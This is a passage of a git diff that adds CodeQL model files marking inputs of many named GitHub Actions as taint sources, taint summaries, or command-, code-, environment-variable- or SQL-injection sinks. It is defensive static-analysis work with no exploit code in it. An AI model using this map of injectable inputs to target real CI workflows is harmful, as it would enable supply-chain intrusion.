data: + - ["alessbell/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] + diff --git a/actions/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml b/actions/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml new file mode 100644 index 000000000000..8d49c5436e62 --- /dev/null +++ b/actions/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"] diff --git a/actions/ql/lib/ext/manual/anchore_sbom-action.model.yml b/actions/ql/lib/ext/manual/anchore_sbom-action.model.yml new file mode 100644 index 000000000000..d607aee0514a --- /dev/null +++ b/actions/ql/lib/ext/manual/anchore_sbom-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.format", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.path", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.file", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.image", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/anchore_scan-action.model.yml b/actions/ql/lib/ext/manual/anchore_scan-action.model.yml new file mode 100644 index 000000000000..93bfef222696 --- /dev/null +++ b/actions/ql/lib/ext/manual/anchore_scan-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/andresz1_size-limit-action.model.yml b/actions/ql/lib/ext/manual/andresz1_size-limit-action.model.yml new file mode 100644 index 000000000000..84500597ce23 --- /dev/null +++ b/actions/ql/lib/ext/manual/andresz1_size-limit-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] + - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection", "manual"] + - ["andresz1/size-limit-action", "*", "input.script", "command-injection", "manual"] + - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/android-actions_setup-android.model.yml b/actions/ql/lib/ext/manual/android-actions_setup-android.model.yml new file mode 100644 index 000000000000..3db7aa5db2cd --- /dev/null +++ b/actions/ql/lib/ext/manual/android-actions_setup-android.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml b/actions/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml new file mode 100644 index 000000000000..ac01c86d5874 --- /dev/null +++ b/actions/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + # https://github.com/ankitjain28may/list-files-in-pr + - ["ankitjain28may/list-files-in-pr", "*", "output.pullRequestFiles", "filename", "manual"] + + diff --git a/actions/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml b/actions/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml new file mode 100644 index 000000000000..47411f7342ad --- /dev/null +++ b/actions/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/appleboy_ssh-action.model.yml b/actions/ql/lib/ext/manual/appleboy_ssh-action.model.yml new file mode 100644 index 000000000000..087045d86b4a --- /dev/null +++ b/actions/ql/lib/ext/manual/appleboy_ssh-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["appleboy/ssh-action", "*", "input.script", "code-injection", "manual"] + - ["appleboy/ssh-action", "*", "input.envs", "envvar-injection", "manual"] + diff --git a/actions/ql/lib/ext/manual/asdf-vm_actions.model.yml b/actions/ql/lib/ext/manual/asdf-vm_actions.model.yml new file mode 100644 index 000000000000..29276b6fdd48 --- /dev/null +++ b/actions/ql/lib/ext/manual/asdf-vm_actions.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml b/actions/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml new file mode 100644 index 000000000000..db6c52b33fd2 --- /dev/null +++ b/actions/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml b/actions/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml new file mode 100644 index 000000000000..d20d698c40d6 --- /dev/null +++ b/actions/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"] + - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/aszc_change-string-case-action.model.yml b/actions/ql/lib/ext/manual/aszc_change-string-case-action.model.yml new file mode 100644 index 000000000000..f0e4e6e31b19 --- /dev/null +++ b/actions/ql/lib/ext/manual/aszc_change-string-case-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"] + - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint", "manual"] + - ["aszc/change-string-case-action", "*", "input.replace-with", "output.lowercase", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml b/actions/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml new file mode 100644 index 000000000000..b15eff553369 --- /dev/null +++ b/actions/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + # https://github.com/AvraamMavridis/files-changed-action + - ["AvraamMavridis/files-changed-action", "*", "output.CHANGED_FILES", "filename", "manual"] + - ["AvraamMavridis/files-changed-action", "*", "output.CHANGED_FILES_EXTENSIONS", "filename", "manual"] + + diff --git a/actions/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml b/actions/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml new file mode 100644 index 000000000000..f17f3c788b3b --- /dev/null +++ b/actions/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "env.AWS_SECRET_ACCESS_KEY", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "secret.AWS_SECRET_ACCESS_KEY", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "env.AWS_SESSION_TOKEN", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "secret.AWS_SESSION_TOKEN", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml b/actions/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml new file mode 100644 index 000000000000..ccdb64fd3f32 --- /dev/null +++ b/actions/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"] + - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/azure_cli.model.yml b/actions/ql/lib/ext/manual/azure_cli.model.yml new file mode 100644 index 000000000000..588c17bc76a4 --- /dev/null +++ b/actions/ql/lib/ext/manual/azure_cli.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["azure/cli", "*", "input.inlineScript", "code-injection", "manual"] + - ["azure/cli", "*", "input.azcliversion", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/azure_powershell.model.yml b/actions/ql/lib/ext/manual/azure_powershell.model.yml new file mode 100644 index 000000000000..901c4cf461e0 --- /dev/null +++ b/actions/ql/lib/ext/manual/azure_powershell.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["azure/powershell", "*", "input.inlineScript", "code-injection", "manual"] + - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/bahmutov_npm-install.model.yml b/actions/ql/lib/ext/manual/bahmutov_npm-install.model.yml new file mode 100644 index 000000000000..8db78b6e9a8b --- /dev/null +++ b/actions/ql/lib/ext/manual/bahmutov_npm-install.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/blackducksoftware_github-action.model.yml b/actions/ql/lib/ext/manual/blackducksoftware_github-action.model.yml new file mode 100644 index 000000000000..20a06102bbdb --- /dev/null +++ b/actions/ql/lib/ext/manual/blackducksoftware_github-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"] + - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection", "manual"] + - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/bobheadxi_deployments.model.yml b/actions/ql/lib/ext/manual/bobheadxi_deployments.model.yml new file mode 100644 index 000000000000..043610ab3a36 --- /dev/null +++ b/actions/ql/lib/ext/manual/bobheadxi_deployments.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml b/actions/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml new file mode 100644 index 000000000000..037b67993f3e --- /dev/null +++ b/actions/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"] + - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml b/actions/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml new file mode 100644 index 000000000000..7483849b916e --- /dev/null +++ b/actions/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml b/actions/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml new file mode 100644 index 000000000000..8f5a15aa1e92 --- /dev/null +++ b/actions/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"] + - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml b/actions/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml new file mode 100644 index 000000000000..f18fd14a4a61 --- /dev/null +++ b/actions/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["c-py/action-dotenv-to-setenv", "*", "artifact", "envvar-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/cachix_cachix-action.model.yml b/actions/ql/lib/ext/manual/cachix_cachix-action.model.yml new file mode 100644 index 000000000000..f3eabe2c17d7 --- /dev/null +++ b/actions/ql/lib/ext/manual/cachix_cachix-action.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"] + - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/changesets_action.model.yml b/actions/ql/lib/ext/manual/changesets_action.model.yml new file mode 100644 index 000000000000..e1b34c67d492 --- /dev/null +++ b/actions/ql/lib/ext/manual/changesets_action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["changesets/action", "*", "input.publish", "command-injection", "manual"] + - ["changesets/action", "*", "input.version", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml b/actions/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml new file mode 100644 index 000000000000..9f212f145f6a --- /dev/null +++ b/actions/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"] + - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml b/actions/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml new file mode 100644 index 000000000000..49a399355443 --- /dev/null +++ b/actions/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cosq-network/dotenv-loader", "*", "artifact", "envvar-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/coursier_cache-action.model.yml b/actions/ql/lib/ext/manual/coursier_cache-action.model.yml new file mode 100644 index 000000000000..319f712a9bf1 --- /dev/null +++ b/actions/ql/lib/ext/manual/coursier_cache-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml b/actions/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml new file mode 100644 index 000000000000..772a5d59e188 --- /dev/null +++ b/actions/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml b/actions/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml new file mode 100644 index 000000000000..3d1366558fe0 --- /dev/null +++ b/actions/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/csexton_release-asset-action.model.yml b/actions/ql/lib/ext/manual/csexton_release-asset-action.model.yml new file mode 100644 index 000000000000..3da214d62feb --- /dev/null +++ b/actions/ql/lib/ext/manual/csexton_release-asset-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml b/actions/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml new file mode 100644 index 000000000000..37c6af1f99e1 --- /dev/null +++ b/actions/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"] + - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection", "manual"] + - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/cypress-io_github-action.model.yml b/actions/ql/lib/ext/manual/cypress-io_github-action.model.yml new file mode 100644 index 000000000000..fecc9e5ce055 --- /dev/null +++ b/actions/ql/lib/ext/manual/cypress-io_github-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"] diff --git a/actions/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml b/actions/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml new file mode 100644 index 000000000000..34eac65cdc8c --- /dev/null +++ b/actions/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"] + - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml b/actions/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml new file mode 100644 index 000000000000..ba5de3c24706 --- /dev/null +++ b/actions/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml b/actions/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml new file mode 100644 index 000000000000..27a8ffae1857 --- /dev/null +++ b/actions/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"] + - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml b/actions/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml new file mode 100644 index 000000000000..b87f18629996 --- /dev/null +++ b/actions/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"] + - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml b/actions/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml new file mode 100644 index 000000000000..7ead429278e5 --- /dev/null +++ b/actions/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"] diff --git a/actions/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml b/actions/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml new file mode 100644 index 000000000000..6b900caef361 --- /dev/null +++ b/actions/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml b/actions/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml new file mode 100644 index 000000000000..cafdfada61ba --- /dev/null +++ b/actions/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection", "manual"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection", "manual"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection", "manual"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection", "manual"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml b/actions/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml new file mode 100644 index 000000000000..646d54ac92ab --- /dev/null +++ b/actions/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["devorbitus/yq-action-output", "*", "input.cmd", "code-injection", "manual"] + diff --git a/actions/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml b/actions/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml new file mode 100644 index 000000000000..f316799fa4a7 --- /dev/null +++ b/actions/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection", "manual"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/docker_build-push-action.model.yml b/actions/ql/lib/ext/manual/docker_build-push-action.model.yml new file mode 100644 index 000000000000..116c231c30a4 --- /dev/null +++ b/actions/ql/lib/ext/manual/docker_build-push-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml b/actions/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml new file mode 100644 index 000000000000..a60f1cc9fb1a --- /dev/null +++ b/actions/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["dsfx3d/action-extract-unique-matches", "*", "input.text", "output.matches", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml b/actions/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml new file mode 100644 index 000000000000..eafb7d1fc3aa --- /dev/null +++ b/actions/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["eficode/resolve-pr-refs", "*", "output.head_ref", "branch", "manual"] + + diff --git a/actions/ql/lib/ext/manual/endbug_latest-tag.model.yml b/actions/ql/lib/ext/manual/endbug_latest-tag.model.yml new file mode 100644 index 000000000000..b4aab55179b3 --- /dev/null +++ b/actions/ql/lib/ext/manual/endbug_latest-tag.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"] + - ["endbug/latest-tag", "*", "input.tag-name", "command-injection", "manual"] + - ["endbug/latest-tag", "*", "input.git-directory", "command-injection", "manual"] + - ["endbug/latest-tag", "*", "input.description", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/expo_expo-github-action.model.yml b/actions/ql/lib/ext/manual/expo_expo-github-action.model.yml new file mode 100644 index 000000000000..3b7b4aea7133 --- /dev/null +++ b/actions/ql/lib/ext/manual/expo_expo-github-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"] + - ["expo/expo-github-action", "*", "input.packager", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml b/actions/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml new file mode 100644 index 000000000000..b09bec4a1d42 --- /dev/null +++ b/actions/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/frabert_replace-string-action.model.yml b/actions/ql/lib/ext/manual/frabert_replace-string-action.model.yml new file mode 100644 index 000000000000..cb71f958365e --- /dev/null +++ b/actions/ql/lib/ext/manual/frabert_replace-string-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"] + - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml b/actions/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml new file mode 100644 index 000000000000..c4f8a3efe3ea --- /dev/null +++ b/actions/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "title", "manual"] diff --git a/actions/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml b/actions/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml new file mode 100644 index 000000000000..aa9dd5096610 --- /dev/null +++ b/actions/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"] + - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/game-ci_unity-builder.model.yml b/actions/ql/lib/ext/manual/game-ci_unity-builder.model.yml new file mode 100644 index 000000000000..767c77310e8d --- /dev/null +++ b/actions/ql/lib/ext/manual/game-ci_unity-builder.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"] + - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml 